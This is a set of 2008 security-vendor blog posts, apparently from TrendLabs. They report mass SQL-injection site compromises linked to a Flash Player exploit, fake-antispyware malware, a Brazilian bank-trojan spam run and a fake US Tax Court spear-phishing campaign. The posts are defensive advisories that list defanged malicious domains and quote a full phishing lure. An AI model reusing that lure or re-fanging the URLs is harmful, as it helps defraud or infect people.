Another mass compromise through SQL injection attack (yet again). The yet agains and anothers keep coming, right? This time, unlike its predecessors that use relatively old and known (and patched) exploits, the attack introduces a new kid on the block: in the form of what looks like a zero-day exploit taking advantage of an unknown vulnerability in Adobe Flash Player, allowing malicious users to install malware on affected PCs.

Well, this one already has a lot of history in it. Mass compromises are the month of May’s major stories. TrendLabs discovered them happening to Web sites everywhere from a huge portion of the Asian region (see here and here) to those in the Italian language. We have seen these mass compromises occurring just mere days from one incident to the next (besides the links above, more information can be read in our blog).

Certain legitimate sites were found to have been injected with scripts that silently lead browsers to sites hosting exploits for the Flash vulnerability/ies. Upon meeting certain system conditions that allow the exploitation to commence, PCs download and execute malware detected as TROJ_WIESSY.J and WORM_OTWYCAL.BO.

TrendLabs detects the malicious script as HTML_DLDR.BF, and the .SWF files as SWF_DLOADER.YVM and SWF_DLOADER.YVN. SWF_DLOADER.YVM downloads more files detected as SWF_DLOADER.YVN. Meanwhile, SWF_DLOADER.YVN exploits the vulnerability Integer Overflow in Adobe Flash Player Allows Remote Arbitrary Code Execution to download files initially detected as TSPY_UPACK.D and TROJ_DROPPER.NAK. The downloaded files later changed, now detected as TROJ_WIESSY.J and WORM_OTWYCAL.BO.

Remarkably, the related domains in this attack spoof the domain name of a legitimate and well-known telecommunications corporation as well as that of a popular online game. Other domains are lkjrc and woai117 (both belonging to–surprise, surprise–.cn).

Trend Micro Web Threat Protection (WTP) already blocks access to the malicious domains involved in this attack.

Our engineers are analyzing this attack further. Updates will be posted as soon as more information becomes available. As of this writing, we are still seeing several new malicious domains that are hosting .SWF files exploiting the Adobe Flash Player bug.

Updated as of May 29, 2008, 4:00am PST

While filtering URLs from emails gathered with an email honey pot we came across mails containing URLs pointing to a file named “video.exe”. We assumed it to be a very obvious hint to possible malicious activity, so we decided to get our hands dirty and do some digging. Here’s a screenshot of the sample mail:

The URL behind the Watch hyperlink is a redirection made by doubleclick.net which is an advertising service. It seems that the file was moved from its server, causing the advertising service to make a redirection to certain Web sites that also host the file VIDEO.EXE. The said file is detected by Trend Micro as TROJ_NUWAR.ZJ.

So far we have seen two Web sites that seem to have been compromised to house the malicious file. The sites hxxp://infopointitalia.it and hxxp://escortsmurcia.com are the two sites affected, but it should be noted that visiting the sites won’t trigger infection; adding the filename VIDEO.EXE to the end of the URL however, will lead to trouble (users are warned that doing this will lead to possible malware infection). Owners of both affected Web sites had been informed of this, and as of this writing, the malicious file had been removed from hxxp://escortmurcia.com.

TROJ_NUWAR.ZJ installs itself as a service on the affected system and hooks the browser with a malicious BHO (browser helper object). In doing so, it is able to download a text file that contains several URLs related to porn and advertising Web sites. It also writes on text files found on the affected system words related to adult, pharmacy and finance Web content.

The trouble does not end there. When the user restarts the browser or the affected system, several annoying “spyware warning” symptoms start to appear:

A warning appears on the screen that their system if being infiltrated, prompting the installation of an antispyware application. A “Windows Security Center Warning” also appears on the taskbar, telling the user that their computer is running slowly due to malware activity. Here is a screenshot of the said warnings:

Another warning is shown through Internet Explorer, showing an image similar to Windows Security Center messages, telling the user that a possible spyware infection has been detected:

The desktop background image is changed to a picture of alarming color, made to rattle the user:

Task Manager is disabled by the malware, inabling the user from terminating the malware process. When the user gets desperate and finally tries to download the “AntiSpySpider” software to solve the issue, the user will find that the system is still infected.

Additionally, the initial redirection the advertising server does seem to make a connection to an other URL, hxxp://{BLOCKED}front.net/l.php?id=119.The URL leads to a download of a windows executable that is runtime encrypted. Playing around with the ids at the end of the URL leads to several other files that are binary different but of the same size and are triggering the heuristic detection TROJ_TIBS.JHT.

All files involved were already submitted to TrendLabs for detection.

The article is based on a joint research with Alice Decker.

A few hours ago we discovered a spam run in Brazil that uses a trendmicro address in its From field:

Figure 1. Sample of Brazilian spam first seen evening of May 22 by our honeypots.

Our support team in the Latin American region observed some 6,000 samples of this spam since it was first identified. The blast seems to be coming down to approximately 15 samples a minute, according to one of our analysts from the region.

When translated it reads as follows (grammar lapses intact):

Subject: you may loose all your information as well as your e-mail


Our servers have detected a security failure in your email account. for more security without the loose of data or vulnerabilities on your email box we remind you to active your mailbox


or you will loose all your information as well as your email

to activate your mailbox is very easy

1 click on the link below
2 you will see a window with the button execute press execute
3 after that click on the button open and you will be redirected to your activated mailbox
4 write your complete email - full name - city - state - zip.

[link] Activate your email mailbox

remember that you have only from 12 to 24 hour To activate your mailbox
otherwise our system will block your E-mail account.

to obtain more information you can get in touch with our services team through our E-mail
[email address]

This “security failure,” ironically, is what happens when the recipient falls for the ruse and clicks on the link to “activate” his/her email inbox.

The link actually leads to hxxp://{BLOCKED}security.bravehost.com/protecao.exe (where hxxp is http). Protecao.exe is detected as TROJ_BANLOAD.FAF. Its main purpose is to connect to another URL in the same domain to download a file named plugin-security.exe. (It also accesses another URL which is inaccessible as of this writing.)

This 3MB file is a Trojan spyware detected by our patterns as TSPY_BANKER.OIZ, and is a bank account info stealing malware. Note that upon clicking the link in the spam, a dialog prompt appears asking the user whether to Open, Run or Save the file. However, upon accepting the file, it goes on to download the spyware without informing the user.

We advise Latin American users to be especially wary of this attack. Sometimes users are more likely to trust an email message written in their native language, but in this case we must chalk this up to targeted social engineering and should, as always, immediately delete such threatening mail. Note that Trend Micro will NEVER send email such as this.

Legitimate communications typically come with the appropriate headings, company logos, and proper language. Another possible tell-tale sign that the email is not legitimate is that the link is connected directly to an executable.

Trend Micro users, on the other hand, need not worry, as our Web Threat Protection technology cuts off infection by both detecting the attack-related files and blocking the malicious URLs. Our antispam definitions already filter this threat.

What to do if you are a customer and in the future you receive an unexpected or suspicious email that seems to come from Trend Micro? The best thing to do is to contact your local support rep or account manager to verify its legitimacy.

Thanks to Threats Analyst Jose Lopez Tello for alerting us to this attack.

The Content Security (CS) team of TrendLabs has come across a new spear phishing incident that’s reminiscent of the whale phishing incident documented last April, wherein bogus subpoenas were sent to CEOs.

The new spam run involves email messages sent to specific organizations as notices of deficiency or tax petitions supposedly coming from the United States Tax Court (refer to Figure 1).

Figure 1: Sample screenshot of the spammed spear phishing email

Once members of a targeted organization click on the link in the message body, they are directed to the site www.ustax-courts.com—the purported US Tax Court site—and asked to download a higher version of Internet Explorer (IE) onto their system to further view court details (see Figure 2). By string manipulation (in this case, adding a dash to the actual domain name of the actual site), unknowing users are easily made to believe that the bogus site is legitimate, making them most likely to click on the link.

The legitimate US Tax Court site is www.ustaxcourt.gov.

Figure 2: Sample screenshot of the bogus US Tax Court Web site

Trend Micro advises users to be cautious in viewing emails and warns against clicking automatically on given links within these messages. As we have advised before, consult with lawyers in case important-looking emails may be valid. But in this case, the concerned Court has declared that it does not send email notices to those with cases before it:

TrendLabs received reports that several Web sites in Japan — including a popular music download site and a music company site — have been found injected with malicious code.

As we have been learning the past few days, getting hacked is becoming a—sadly—more frequent, but no less dangerous, threat for Web site owners. More importantly, users browsing these compromised sites are put in harm’s way, as hackers inject these codes to eventually plant backdoors and spyware in users’ PCs.

Analyses by our engineers reveal that these compromises are actually related to previously reported mass SQL injection attacks. Three distinct malicious domains have been identified, all of which lead to the download of malicious files on the affected system.

They are the following:

• nihaorr1(dot)com
• bluell(dot)cn
• 9i5t(dot)cn

We call them “known malicious domains” because we have seen already these in the attacks that we blogged about here and here. Apparently the reach of these attacks is growing wider, suggesting indeed that an automated tool is being used to seek out vulnerable sites that can then be hijacked to redirect users. And the scarier implication: that no weakly-coded site is safe.

These domains, needless to say, have already been blocked by our Web Threat Protection technology, one even as early as April 24, when it was first seen to be involved in these malicious stunts. Trend Micro users are thus protected from this attack. Other users are advised to be wary when surfing the Internet, and make sure that their endpoint security products and security patches are up to date.